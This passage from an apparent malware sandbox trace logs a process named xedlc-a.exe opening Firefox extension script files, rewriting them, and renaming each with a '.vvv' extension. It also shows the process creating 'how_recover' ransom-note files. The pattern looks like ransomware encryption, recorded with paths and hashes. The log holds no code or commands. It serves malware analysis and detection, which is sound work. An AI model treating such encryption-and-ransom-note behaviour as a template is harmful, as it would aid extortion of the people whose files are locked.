53159.          sequenceNumber: 1181
53160.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\file.js
53161.          filesize: 7038
53162.          md5sum: 04fe9ce1a96cada1d01a3e8ec0f25356
53163.          sha1sum: 4bb27564e106af86051c692edcbcc35f921a917a
53164.          processinfo:
53165.            pid: 1056
53166.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53167.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53168.            ads:
53169.          fid (ads:): 562949953476262
53170.          ntstatus: 0x0
53171.          CreateOptions: 0x0
53172.        file:
53173.          timestamp: 78722
53174.          mode: rename
53175.          sequenceNumber: 1182
53176.          filesize: 7038
53177.          md5sum: 04fe9ce1a96cada1d01a3e8ec0f25356
53178.          sha1sum: 4bb27564e106af86051c692edcbcc35f921a917a
53179.          processinfo:
53180.            pid: 1056
53181.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53182.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53183.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\file.js
53184.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\file.js.vvv
53185.            ads:
53186.          fid (ads:): 562949953476262
53187.          ntstatus: 0x0
53188.          CreateOptions: 0x0
53189.        file:
53190.          timestamp: 78734
53191.          mode: open
53192.          sequenceNumber: 1183
53193.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\find-tests-e10s-adapter.js
53194.          filesize: 3970
53195.          processinfo:
53196.            pid: 1056
53197.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53198.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53199.            ads:
53200.          fid (ads:): 562949953476253
53201.          ntstatus: 0x0
53202.          CreateOptions: 0x60
53203.        file:
53204.          timestamp: 78870
53205.          mode: close
53206.          sequenceNumber: 1184
53207.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\find-tests-e10s-adapter.js
53208.          filesize: 4398
53209.          md5sum: d787790aa70716a8cb3f0b97ae4be09c
53210.          sha1sum: 1e42299b7363bbd06059f5fde3a2227ef891f6d8
53211.          processinfo:
53212.            pid: 1056
53213.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53214.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53215.            ads:
53216.          fid (ads:): 562949953476253
53217.          ntstatus: 0x0
53218.          CreateOptions: 0x0
53219.        file:
53220.          timestamp: 78885
53221.          mode: rename
53222.          sequenceNumber: 1185
53223.          filesize: 4398
53224.          md5sum: d787790aa70716a8cb3f0b97ae4be09c
53225.          sha1sum: 1e42299b7363bbd06059f5fde3a2227ef891f6d8
53226.          processinfo:
53227.            pid: 1056
53228.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53229.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53230.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\find-tests-e10s-adapter.js
53231.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\find-tests-e10s-adapter.js.vvv
53232.            ads:
53233.          fid (ads:): 562949953476253
53234.          ntstatus: 0x0
53235.          CreateOptions: 0x0
53236.        file:
53237.          timestamp: 78899
53238.          mode: open
53239.          sequenceNumber: 1186
53240.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\find-tests.js
53241.          filesize: 38
53242.          processinfo:
53243.            pid: 1056
53244.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53245.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53246.            ads:
53247.          fid (ads:): 281474976765913
53248.          ntstatus: 0x0
53249.          CreateOptions: 0x60
53250.        file:
53251.          timestamp: 78909
53252.          mode: close
53253.          sequenceNumber: 1187
53254.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\find-tests.js
53255.          filesize: 462
53256.          md5sum: 7b02a6546537ebae0926b71c33ee05cc
53257.          sha1sum: fdc93d334b6086fc204fb10dcc5b7da5b7cb86aa
53258.          processinfo:
53259.            pid: 1056
53260.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53261.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53262.            ads:
53263.          fid (ads:): 281474976765913
53264.          ntstatus: 0x0
53265.          CreateOptions: 0x0
53266.        file:
53267.          timestamp: 78924
53268.          mode: rename
53269.          sequenceNumber: 1188
53270.          filesize: 462
53271.          md5sum: 7b02a6546537ebae0926b71c33ee05cc
53272.          sha1sum: fdc93d334b6086fc204fb10dcc5b7da5b7cb86aa
53273.          processinfo:
53274.            pid: 1056
53275.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53276.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53277.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\find-tests.js
53278.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\find-tests.js.vvv
53279.            ads:
53280.          fid (ads:): 281474976765913
53281.          ntstatus: 0x0
53282.          CreateOptions: 0x0
53283.        file:
53284.          timestamp: 78940
53285.          mode: open
53286.          sequenceNumber: 1189
53287.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\hidden-frame.js
53288.          filesize: 7014
53289.          processinfo:
53290.            pid: 1056
53291.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53292.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53293.            ads:
53294.          fid (ads:): 281474976765902
53295.          ntstatus: 0x0
53296.          CreateOptions: 0x60
53297.        file:
53298.          timestamp: 79112
53299.          mode: close
53300.          sequenceNumber: 1190
53301.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\hidden-frame.js
53302.          filesize: 7438
53303.          md5sum: 39e881253a5de131dcfa4586e9558599
53304.          sha1sum: cc17021604144e342171933badbacbf763581671
53305.          processinfo:
53306.            pid: 1056
53307.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53308.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53309.            ads:
53310.          fid (ads:): 281474976765902
53311.          ntstatus: 0x0
53312.          CreateOptions: 0x0
53313.        file:
53314.          timestamp: 79124
53315.          mode: rename
53316.          sequenceNumber: 1191
53317.          filesize: 7438
53318.          md5sum: 39e881253a5de131dcfa4586e9558599
53319.          sha1sum: cc17021604144e342171933badbacbf763581671
53320.          processinfo:
53321.            pid: 1056
53322.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53323.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53324.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\hidden-frame.js
53325.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\hidden-frame.js.vvv
53326.            ads:
53327.          fid (ads:): 281474976765902
53328.          ntstatus: 0x0
53329.          CreateOptions: 0x0
53330.        file:
53331.          timestamp: 79137
53332.          mode: open
53333.          sequenceNumber: 1192
53334.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\hotkeys.js
53335.          filesize: 5226
53336.          processinfo:
53337.            pid: 1056
53338.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53339.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53340.            ads:
53341.          fid (ads:): 281474976765879
53342.          ntstatus: 0x0
53343.          CreateOptions: 0x60
53344.        file:
53345.          timestamp: 79234
53346.          mode: close
53347.          sequenceNumber: 1193
53348.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\hotkeys.js
53349.          filesize: 5646
53350.          md5sum: 2886f0d9051b7efb7fd5aaf5048993ed
53351.          sha1sum: 83877333213ddfc055ca4276a2aaf618baa88816
53352.          processinfo:
53353.            pid: 1056
53354.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53355.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53356.            ads:
53357.          fid (ads:): 281474976765879
53358.          ntstatus: 0x0
53359.          CreateOptions: 0x0
53360.        file:
53361.          timestamp: 79252
53362.          mode: rename
53363.          sequenceNumber: 1194
53364.          filesize: 5646
53365.          md5sum: 2886f0d9051b7efb7fd5aaf5048993ed
53366.          sha1sum: 83877333213ddfc055ca4276a2aaf618baa88816
53367.          processinfo:
53368.            pid: 1056
53369.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53370.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53371.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\hotkeys.js
53372.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\hotkeys.js.vvv
53373.            ads:
53374.          fid (ads:): 281474976765879
53375.          ntstatus: 0x0
53376.          CreateOptions: 0x0
53377.        file:
53378.          timestamp: 79265
53379.          mode: open
53380.          sequenceNumber: 1195
53381.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\observer.js
53382.          filesize: 3351
53383.          processinfo:
53384.            pid: 1056
53385.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53386.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53387.            ads:
53388.          fid (ads:): 281474976765855
53389.          ntstatus: 0x0
53390.          CreateOptions: 0x60
53391.        file:
53392.          timestamp: 79275
53393.          mode: close
53394.          sequenceNumber: 1196
53395.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\observer.js
53396.          filesize: 3774
53397.          md5sum: dc9b7dcfba608e2b0ae08877fd4564f0
53398.          sha1sum: b0c571e646369033b3b5bfb32f8571db4d1bf73e
53399.          processinfo:
53400.            pid: 1056
53401.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53402.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53403.            ads:
53404.          fid (ads:): 281474976765855
53405.          ntstatus: 0x0
53406.          CreateOptions: 0x0
53407.        file:
53408.          timestamp: 79289
53409.          mode: rename
53410.          sequenceNumber: 1197
53411.          filesize: 3774
53412.          md5sum: dc9b7dcfba608e2b0ae08877fd4564f0
53413.          sha1sum: b0c571e646369033b3b5bfb32f8571db4d1bf73e
53414.          processinfo:
53415.            pid: 1056
53416.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53417.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53418.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\observer.js
53419.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\observer.js.vvv
53420.            ads:
53421.          fid (ads:): 281474976765855
53422.          ntstatus: 0x0
53423.          CreateOptions: 0x0
53424.        file:
53425.          timestamp: 79300
53426.          mode: open
53427.          sequenceNumber: 1198
53428.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\utils.js
53429.          filesize: 6658
53430.          processinfo:
53431.            pid: 1056
53432.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53433.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53434.            ads:
53435.          fid (ads:): 562949953476251
53436.          ntstatus: 0x0
53437.          CreateOptions: 0x60
53438.        file:
53439.          timestamp: 79330
53440.          mode: close
53441.          sequenceNumber: 1199
53442.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\utils.js
53443.          filesize: 7086
53444.          md5sum: a883fba32b37c591cbb493d26a3a3385
53445.          sha1sum: c4d905cbd29b64cb0b23f8c7b051bfb292b8ef7f
53446.          processinfo:
53447.            pid: 1056
53448.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53449.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53450.            ads:
53451.          fid (ads:): 562949953476251
53452.          ntstatus: 0x0
53453.          CreateOptions: 0x0
53454.        file:
53455.          timestamp: 79343
53456.          mode: rename
53457.          sequenceNumber: 1200
53458.          filesize: 7086
53459.          md5sum: a883fba32b37c591cbb493d26a3a3385
53460.          sha1sum: c4d905cbd29b64cb0b23f8c7b051bfb292b8ef7f
53461.          processinfo:
53462.            pid: 1056
53463.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53464.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53465.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\utils.js
53466.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\utils.js.vvv
53467.            ads:
53468.          fid (ads:): 562949953476251
53469.          ntstatus: 0x0
53470.          CreateOptions: 0x0
53471.        file:
53472.          timestamp: 79357
53473.          mode: created
53474.          sequenceNumber: 1201
53475.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\how_recover+utm.txt
53476.          processinfo:
53477.            pid: 1056
53478.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53479.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53480.            ads:
53481.          fid (ads:): 281474976778345
53482.          ntstatus: 0x0
53483.          CreateOptions: 0x60
53484.        file:
53485.          timestamp: 79367
53486.          mode: close
53487.          sequenceNumber: 1202
53488.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\how_recover+utm.txt
53489.          filesize: 2682
53490.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
53491.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
53492.          processinfo:
53493.            pid: 1056
53494.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53495.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53496.            ads:
53497.          fid (ads:): 281474976778345
53498.          ntstatus: 0x0
53499.          CreateOptions: 0x0
53500.        file:
53501.          timestamp: 79376
53502.          mode: created
53503.          sequenceNumber: 1203
53504.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\how_recover+utm.html
53505.          processinfo:
53506.            pid: 1056
53507.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53508.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53509.            ads:
53510.          fid (ads:): 281474976778346
53511.          ntstatus: 0x0
53512.          CreateOptions: 0x60
53513.        file:
53514.          timestamp: 79384
53515.          mode: close
53516.          sequenceNumber: 1204
53517.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\how_recover+utm.html
53518.          filesize: 9495
53519.          md5sum: 95f596a25dff51b6af2042b1bbe02985
53520.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
53521.          processinfo:
53522.            pid: 1056
53523.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53524.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53525.            ads:
53526.          fid (ads:): 281474976778346
53527.          ntstatus: 0x0
53528.          CreateOptions: 0x0
53529.        file:
53530.          timestamp: 79393
53531.          mode: open
53532.          sequenceNumber: 1205
53533.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\light-traits.js
53534.          filesize: 23934
53535.          processinfo:
53536.            pid: 1056
53537.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53538.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53539.            ads:
53540.          fid (ads:): 281474976765862
53541.          ntstatus: 0x0
53542.          CreateOptions: 0x60
53543.        file:
53544.          timestamp: 79502
53545.          mode: close
53546.          sequenceNumber: 1206
53547.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\light-traits.js
53548.          filesize: 24350
53549.          md5sum: 105eaaf5ae01eb9fcfa08e0e1f175803
53550.          sha1sum: b099c5422f3842d2f49cd19cc7d2d792768df7d7
53551.          processinfo:
53552.            pid: 1056
53553.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53554.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53555.            ads:
53556.          fid (ads:): 281474976765862
53557.          ntstatus: 0x0
53558.          CreateOptions: 0x0
53559.        file:
53560.          timestamp: 79515
53561.          mode: rename
53562.          sequenceNumber: 1207
53563.          filesize: 24350
53564.          md5sum: 105eaaf5ae01eb9fcfa08e0e1f175803
53565.          sha1sum: b099c5422f3842d2f49cd19cc7d2d792768df7d7
53566.          processinfo:
53567.            pid: 1056
53568.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53569.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53570.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\light-traits.js
53571.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\light-traits.js.vvv
53572.            ads:
53573.          fid (ads:): 281474976765862
53574.          ntstatus: 0x0
53575.          CreateOptions: 0x0
53576.        file:
53577.          timestamp: 79527
53578.          mode: open
53579.          sequenceNumber: 1208
53580.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\list.js
53581.          filesize: 5363
53582.          processinfo:
53583.            pid: 1056
53584.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53585.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53586.            ads:
53587.          fid (ads:): 281474976765873
53588.          ntstatus: 0x0
53589.          CreateOptions: 0x60
53590.        file:
53591.          timestamp: 79562
53592.          mode: close
53593.          sequenceNumber: 1209
53594.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\list.js
53595.          filesize: 5790
53596.          md5sum: bc867b0f9593076124493465fc4e4e67
53597.          sha1sum: 24fa9687d178c04361a03597d5fb0e9abfa615de
53598.          processinfo:
53599.            pid: 1056
53600.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53601.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53602.            ads:
53603.          fid (ads:): 281474976765873
53604.          ntstatus: 0x0
53605.          CreateOptions: 0x0
53606.        file:
53607.          timestamp: 79575
53608.          mode: rename
53609.          sequenceNumber: 1210
53610.          filesize: 5790
53611.          md5sum: bc867b0f9593076124493465fc4e4e67
53612.          sha1sum: 24fa9687d178c04361a03597d5fb0e9abfa615de
53613.          processinfo:
53614.            pid: 1056
53615.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53616.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53617.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\list.js
53618.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\list.js.vvv
53619.            ads:
53620.          fid (ads:): 281474976765873
53621.          ntstatus: 0x0
53622.          CreateOptions: 0x0
53623.        file:
53624.          timestamp: 79586
53625.          mode: open
53626.          sequenceNumber: 1211
53627.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\match-pattern.js
53628.          filesize: 5222
53629.          processinfo:
53630.            pid: 1056
53631.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53632.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53633.            ads:
53634.          fid (ads:): 281474976765899
53635.          ntstatus: 0x0
53636.          CreateOptions: 0x60
53637.        file:
53638.          timestamp: 79679
53639.          mode: close
53640.          sequenceNumber: 1212
53641.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\match-pattern.js
53642.          filesize: 5646
53643.          md5sum: 1ca61ddf2f3582667e8cd138a32e668b
53644.          sha1sum: 6e95e5689cdfbfe12be67346b9d93808aeded733
53645.          processinfo:
53646.            pid: 1056
53647.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53648.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53649.            ads:
53650.          fid (ads:): 281474976765899
53651.          ntstatus: 0x0
53652.          CreateOptions: 0x0
53653.        file:
53654.          timestamp: 79693
53655.          mode: rename
53656.          sequenceNumber: 1213
53657.          filesize: 5646
53658.          md5sum: 1ca61ddf2f3582667e8cd138a32e668b
53659.          sha1sum: 6e95e5689cdfbfe12be67346b9d93808aeded733
53660.          processinfo:
53661.            pid: 1056
53662.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53663.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53664.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\match-pattern.js
53665.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\match-pattern.js.vvv
53666.            ads:
53667.          fid (ads:): 281474976765899
53668.          ntstatus: 0x0
53669.          CreateOptions: 0x0
53670.        file:
53671.          timestamp: 79704
53672.          mode: open
53673.          sequenceNumber: 1214
53674.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\memory.js
53675.          filesize: 4754
53676.          processinfo:
53677.            pid: 1056
53678.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53679.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53680.            ads:
53681.          fid (ads:): 281474976765887
53682.          ntstatus: 0x0
53683.          CreateOptions: 0x60
53684.        file:
53685.          timestamp: 79757
53686.          mode: close
53687.          sequenceNumber: 1215
53688.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\memory.js
53689.          filesize: 5182
53690.          md5sum: 32ea96f216cda96253623e82bb442152
53691.          sha1sum: 2fe3bc6cccb88f0be7a26491d0fd10b37173c81d
53692.          processinfo:
53693.            pid: 1056
53694.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53695.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53696.            ads:
53697.          fid (ads:): 281474976765887
53698.          ntstatus: 0x0
53699.          CreateOptions: 0x0
53700.        file:
53701.          timestamp: 79769
53702.          mode: rename
53703.          sequenceNumber: 1216
53704.          filesize: 5182
53705.          md5sum: 32ea96f216cda96253623e82bb442152
53706.          sha1sum: 2fe3bc6cccb88f0be7a26491d0fd10b37173c81d
53707.          processinfo:
53708.            pid: 1056
53709.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
